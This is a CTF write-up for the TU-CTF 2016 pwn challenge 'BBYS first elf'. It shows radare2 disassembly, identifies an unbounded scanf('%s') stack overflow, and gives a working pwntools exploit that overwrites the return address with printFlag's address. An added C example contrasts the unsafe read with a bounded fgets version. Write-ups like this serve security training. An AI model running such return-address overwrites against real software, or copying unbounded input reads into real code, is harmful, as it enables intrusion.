
CTF practice: TU-CTF 2016 pwn BBYS-first-elf-25 write-up

2016-12-07 10:57  495 views

Challenge overview

Too easy to need much of an overview. Open it in radare2 (I'm on Linux; firing up a Windows VM just for IDA is too much hassle, so I usually can't be bothered):

[0x080485c9]> iI
havecode true
pic      false
canary   false
nx       true
crypto   false
va       true
intrp    /lib/ld-linux.so.2
bintype  elf
class    ELF32
lang     c
arch     x86
bits     32
machine  Intel 80386
os       linux
minopsz  1
maxopsz  16
pcalign  0
subsys   linux
endian   little
stripped false
static   false
linenum  true
lsyms    true
relocs   true
rpath    NONE
binsz    7591


Then look at main: it is just one input and one output. The input goes through scanf with the format at 0x80486d8 (the listed dword 0x44007325 is "%s\0" in little-endian, i.e. a plain "%s"), reading a string into the buffer at esp+0x14 with no length limit, so the bug is obvious... a stack overflow.

[0x080485c9]> s main
[0x080485c9]> pdf
;-- main:
/ (fcn) sym.main 60
|   sym.main ();
|           ; var int local_4h @ esp+0x4
|           ; var int local_14h @ esp+0x14
|           ; JMP XREF from 0x08048487 (entry0)
|           ; DATA XREF from 0x08048487 (entry0)
|           0x080485c9 01:002b      55             push ebp
|           0x080485ca 01:002c      89e5           mov ebp, esp
|           0x080485cc 01:002d      83e4f0         and esp, 0xfffffff0
|           0x080485cf 01:002e      83ec20         sub esp, 0x20
|           0x080485d2 01:002f      c70424ac8604.  mov dword [esp], str.This_program_is_hungry._You_should_feed_it. ; [0x80486ac:4]=0x73696854 LEA str.This_program_is_hungry._You_should_feed_it. ; "This program is hungry. You should feed it." @ 0x80486ac ; const char * s
|           0x080485d9 00:0000      e842feffff     call sym.imp.puts  ; int puts(const char *s);
|           0x080485de 01:0030      8d442414       lea eax, dword [esp + local_14h] ; 0x14
|           0x080485e2 01:0031      89442404       mov dword [esp + local_4h], eax
|           0x080485e6 01:0032      c70424d88604.  mov dword [esp], 0x80486d8 ; [0x80486d8:4]=0x44007325 ; const char * format
|           0x080485ed 00:0000      e86efeffff     call sym.imp.__isoc99_scanf; int scanf(const char *format);
|           0x080485f2 01:0033      c70424db8604.  mov dword [esp], str.Do_you_feel_the_flow_ ; [0x80486db:4]=0x79206f44 LEA str.Do_you_feel_the_flow_ ; "Do you feel the flow?" @ 0x80486db ; const char * s
|           0x080485f9 00:0000      e822feffff     call sym.imp.puts  ; int puts(const char *s);
|           0x080485fe 01:0034      b800000000     mov eax, 0
|           0x08048603 01:0035      c9             leave
\           0x08048604 00:0000      c3             ret


Analysis

So how do we exploit it? At first I thought, with NX enabled, I'd need ROP, but this is a 25-point challenge; wouldn't ROP be a bit much? So I kept an eye out and ran afl:

[0x080485c9]> afl
0x080483b4    3 35           sym._init
0x080483f0    1 6            sym.imp.fflush
0x08048400    1 6            sym.imp.fgets
0x08048410    1 6            sym.imp.fclose
0x08048420    1 6            sym.imp.puts
0x08048430    1 6            loc.imp.__gmon_start__
0x08048440    1 6            sym.imp.__libc_start_main
0x08048450    1 6            sym.imp.fopen
0x08048460    1 6            sym.imp.__isoc99_scanf
0x08048470    1 33   -> 95   entry0
0x080484a0    1 4            sym.__x86.get_pc_thunk.bx
0x080484b0    4 42           sym.deregister_tm_clones
0x080484e0    4 55           sym.register_tm_clones
0x08048520    3 30           sym.__do_global_dtors_aux
0x08048540    4 45   -> 44   sym.frame_dummy
0x0804856d    1 92           sym.printFlag
0x080485c9    1 60           sym.main
0x08048610    4 97           sym.__libc_csu_init
0x08048680    1 2            sym.__libc_csu_fini
0x08048684    1 20           sym._fini


OK, with such an obvious printFlag and no canary, just overflow the buffer and point the return address at printFlag..

exp

from pwn import *

def pwn():
    # the challenge binary is named by its hash and run locally
    r = process("./3d726802521a9ce2b24e2c3baf039915e48ad056")

    # 24 bytes of padding reach the saved return address, which is then
    # overwritten with the address of sym.printFlag (0x0804856d, little-endian)
    payload = b'a' * 24 + b'\x6d\x85\x04\x08'

    r.sendline(payload)
    print(r.recv())

if __name__ == "__main__":
    pwn()
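As an added example (not the challenge's source and not the author's code), here is the read pattern recovered from the listing above next to a hardened version. BUF_SIZE is an assumption, since the listing only fixes the distance from the buffer to the return address; stored_length is a hypothetical helper that feeds constructed input through the safe reader and checks a sentinel placed where the saved return address would sit.

```c
#define _POSIX_C_SOURCE 200809L          /* fmemopen */
#include <stdio.h>
#include <string.h>

/* Assumption: the listing only shows that the return address lies 24 bytes
 * past the buffer start, not the buffer's declared size. */
#define BUF_SIZE 16

/* The challenge's read as recovered from the listing: "%s" carries no field
 * width, so a long line runs past buf over the saved ebp and return address.
 * Kept for contrast only; nothing below calls it. */
int feed_unsafe(FILE *in, char *buf)
{
    return fscanf(in, "%s", buf);
}

/* Hardened read: fgets writes at most size bytes, the newline is stripped,
 * and if the line did not fit the leftover is drained so a later read does
 * not consume it.  Returns the number of characters stored, -1 on EOF/error. */
int feed_safe(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strcspn(buf, "\n");
    int truncated = (buf[len] != '\n');
    buf[len] = '\0';
    if (truncated) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Feeds constructed text through feed_safe into a BUF_SIZE buffer followed
 * by a sentinel word standing in for the saved return address.  Returns the
 * stored length, or -2 if the sentinel was clobbered. */
int stored_length(const char *text)
{
    struct { char buf[BUF_SIZE]; unsigned int sentinel; } frame;
    memset(&frame, 0, sizeof frame);
    frame.sentinel = 0xdeadbeefu;
    FILE *in = fmemopen((void *)text, strlen(text), "r");
    if (in == NULL)
        return -1;
    int n = feed_safe(in, frame.buf, sizeof frame.buf);
    fclose(in);
    return frame.sentinel == 0xdeadbeefu ? n : -2;
}
```

A 16-byte buffer keeps at most 15 characters, so an overlong line is cut there instead of reaching the sentinel.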